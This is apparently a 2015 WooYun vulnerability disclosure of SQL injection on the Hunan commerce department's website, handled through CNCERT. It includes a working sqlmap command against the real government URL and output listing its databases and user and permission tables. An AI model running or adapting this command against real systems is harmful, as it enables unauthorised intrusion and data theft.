漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0115920
漏洞标题:湖南商务厅SQL注入一枚
相关厂商:湖南商务厅
漏洞作者: 小天
提交时间:2015-06-03 08:22
修复时间:2015-07-23 08:10
公开时间:2015-07-23 08:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:11
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开
简要描述:
RT
详细说明:
刚查了一下,,乌云上竟有这个域名的,,好伤心,,,,,,(⊙o⊙)…,注射点不一样可以吗,,,时隔两年,,数据库也增加了啊,,,
有人在13年曾经提过另一处
WooYun: 湖南商务厅SQL注射漏洞可导致全站数据库泄露
那个时候还只有9个DB,
现在都有11个DB了,,
测试的时候请直接输入下面这条指令,,(如果在浏览器输入该链接竟然是下载的,,(⊙o⊙)…)
sqlmap.py -u "http://zwgk.hunancom.gov.cn//Files.aspx?sort=JZ_ShangChuanWenJian_WenJianXiTong&index=4300001000010811102" --dbs
详细如下:
C:\Users\Administrator>sqlmap.py -u "http://zwgk.hunancom.gov.cn//Files.aspx?sort=JZ_ShangChuanWenJian_WenJianXiTong&index=4300001000010811102" --dbs
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] FileManage
[*] GoldSoftPA
[*] GoldSoftPAtest
[*] master
[*] model
[*] msdb
[*] OA
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] XZZF
Database: FileManage
[16 tables]
+-----------------------+
| CaoZuoRiZhi |
| DanWeiXinXi |
| DuanXinGuanLi |
| HuiYiDiDian |
| HuoDongGuanLi |
| HuoDongLeiXing |
| JinJiChengDu |
| JueSe |
| LingDaoPaiXuQingKuang |
| QuanXian |
| SheJiNeiRong |
| WenJianFenLei |
| XinXiDengJi |
| XinXiDengJiLiuCheng |
| XinXiDengJiPiShi |
| YongHuXinXi |
+-----------------------+
漏洞证明:
rt
修复方案:
过滤
版权声明:转载请注明来源 小天@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:11
确认时间:2015-06-08 08:10
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给湖南分中心,由其后续协调网站管理单位处置.
最新状态:
暂无